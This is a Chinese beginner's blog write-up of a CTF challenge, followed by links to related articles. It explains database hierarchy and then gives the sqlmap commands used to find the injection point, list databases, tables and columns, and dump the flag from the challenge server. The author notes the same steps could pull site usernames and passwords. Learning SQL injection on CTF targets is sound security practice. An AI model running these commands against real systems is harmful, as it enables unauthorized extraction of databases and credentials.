第一次完成了一个注入呢,虽然是恬不知耻的用sqlmap跑出来的

简单介绍注入时后台的数据等级,有助于后面的理解

  ①可以类比成一个装着excel文件的文件夹,每一个excel文件就相当于一个数据库

  

  ②库的下一级是表,相当于一个文件中存在的sheet表

  

  ③表的下级是列

  

  ④每一列中又有字段,可以相当于excel中的一个格格啦

简单记一下步骤,大佬们不要嘲笑我这个菜鸡啦

  1、获得注入点,一般在URL末尾存在参数

  2、爆出所有数据库名称

  3、选定数据库,列出其中的表

  4、列出选定表中的列

  5、列出选定列中的所有字段

  6、爆出相应字段

下面以Geek2017的“Cloud的错误”实践一下(大佬们我错了,忘了不能先开wp的规则,这次先隐藏,求轻踩)

网页的源码中有提示"sycid=1",很明显这就是注入点的参数格式啦,丢sqlmap咯

1、检测注入点可用

sqlmap -u http://game.sycsec.com:2007/?sycid=1

  -u :指定注入url

2、暴库

sqlmap -u http://game.sycsec.com:2007/?sycid=1 --dbs

  --dbs :曝出该sqlserver中所有数据库名称

  结果:好像看到了很有趣的“f1ag”库

  

3、列出数据库中的表

sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag --tables

  -D:指定数据库名称(datebase)

  --tables:列出表

  可以看到“f1ag”下只有一个“flag”表

      

4、列出表中的列

sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag -T flag --columns

  -T:指定表名(table)

  --columns:打印列名

  结果:这里列出了表中的两个列,

  这里有个问题,在图形展示的列的名字是不完整的,而应该去上面箭头位置寻找完整的列名

  

5、爆出此列中的字段

sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag -T flag -C f4ag --dump

  -C :指定要暴的列

  --dump:把字段展示出来

  结果:就看到我们最喜欢的flag啦!

  

除了这些,还可以爆网站的用户名密码,以后有机会试试咯

参考网站:http://blog.csdn.net/zgyulongfei/article/details/41017493

作者:辣鸡小谱尼


出处:http://www.cnblogs.com/ZHijack/

如有转载,荣幸之至!请随手标明出处;

SQLMap简单尝试的更多相关文章

  1. 简单尝试Spring Cloud Gateway

    简单尝试Spring Cloud Gateway 简介 Spring Cloud Gateway是一个API网关,它是用于代替Zuul而出现的.Spring Cloud Gateway构建于Sprin ...

  2. python+selenium 简单尝试

    前言 selenium是一种自动化测试工具,简单来说浏览器会根据写好的测试脚本自动做一些操作. 关于自动化测试,一开始接触的是splinter,但是安装的时候发现它是基于selenium的,于是打算直 ...

  3. react-native学习笔记——简单尝试

    毫无疑问,我是个不善于写博文的人. 毫无疑问,react是个出的框架. 毫无疑问,react-native更是个牛逼的引擎. 我个人对react-native的理解就是js被js引擎编译,去调用本地语 ...

  4. 关于MS12-020一次简单尝试

    由于之前着重于web漏洞,主机漏洞这块比较薄弱.也没有用过metasploit,对于很多系统漏洞还不熟悉,正好这几天不忙,就想着慢慢学习,再写点简单的东西,进行总结记录. 这次尝试的是MS12-020 ...

  5. sqlmap简单使用

    就以实验吧上那个简单的sql注入题为例吧,不过那道题确实经典,把sqlmap的整个使用过程都展现了一遍,先奉上那道题的地址:http://ctf5.shiyanbar.com/web/index_3. ...

  6. sqlmap简单中文说明

    首先下载需要的文件,如果是windows环境直接到http://sqlmap.org/下载安装所需要的文件即可. 更新 svn checkout https://svn.sqlmap.org/sqlm ...

  7. sqlmap简单流程使用

    -u “(url)” 1.判断可注入的参数 2.判断可以用那种SQL注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可 ...

  8. 简单尝试利用vultr vps自架PPTP上网用于工作学习需要

    因为学习和工作的需要用到登陆海外网站查阅相关的资料和文档,之前有需要使用的时候是问网友索要的账户登录本地电脑拨号的,但是老是跟别人要还是不好,决定自己尝试搭建一个长期使用.看到有不少的介绍提到VULT ...

  9. mysql sqlmap 注入尝试

    假设注入点为 http://www.abc.com/news.php?id=12 //探测数据库信息 sqlmap -u http://www.abc.com/news.php?id=12 –dbs ...

随机推荐

  1. Lua如何管理”package”

    Lua如何管理"package" 方式一: 私有方法和变量都需要显式定义为local类型的,这很容易造成错误.一旦不小心漏写,就又将方法定义为全局的了. "package ...

  2. HDU 6113 度度熊的01世界

    度度熊的01世界 Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/Others)Total Su ...

  3. Day1作业要求

    Day1作业 作业需求 博客 模拟登录 三级菜单 博客地址 杨振伟Day1博客地址 模拟登录 1.程序说明 实现功能如下 用户输入密码,密码验证后登录成功 用户登录成功后提示登录信息 用户输入3次错误 ...

  4. linq 在查询表达式中处理异常

    在查询表达式的上下文中可以调用任何方法. 但是,我们建议避免在查询表达式中调用任何会产生副作用(如修改数据源内容或引发异常)的方法. 此示例演示在查询表达式中调用方法时如何避免引发异常,而不违反有关异 ...

  5. css中单位 px、em 的区别【转载】

    原文:http://www.admin10000.com/document/6267.html     在国内网站中,包括三大门户,以及“引领”中国网站设计潮流的蓝色理想,ChinaUI等都是使用了p ...

  6. phpmailer 发送邮件(一)

    phpmailer下载地址: PHPMailer : https://github.com/PHPMailer/PHPMailer 一.基本要求 Web访问正常(apache可以正常访问) php 设 ...

  7. [译]ASP.NET Core 2.0 区域

    问题 如何将一个规模庞大的ASP.NET Core 2.0应用程序进行逻辑分组? 答案 新建一个ASP.NET Core 2.0空项目,修改Startup类,增加Mvc服务和中间件: public v ...

  8. Java微信公众平台开发_07_JSSDK图片上传

    一.本节要点 1.获取jsapi_ticket //2.获取getJsapiTicket的接口地址,有效期为7200秒 private static final String GET_JSAPITIC ...

  9. 休息,归类一下CSS初级的东西

    css基础的东西集中体现在了"磊盒子"这一个枯燥无味的东西上面,灵活的运用盒子的内外边距,浮动,定位以及一些基础的属性,将一个静态的页面变得磊出来,这是CSS基础的练习. 在css ...

  10. Makefile持续学习二

    Makefile概述 一.Makefile里有什么? Makefile里主要包含5个东西:显式规则.隐晦规则.变量定义.文件指示和注释 1.显式规则:显式规则说明如恶化生成一个或多的目标文件,包含要生 ...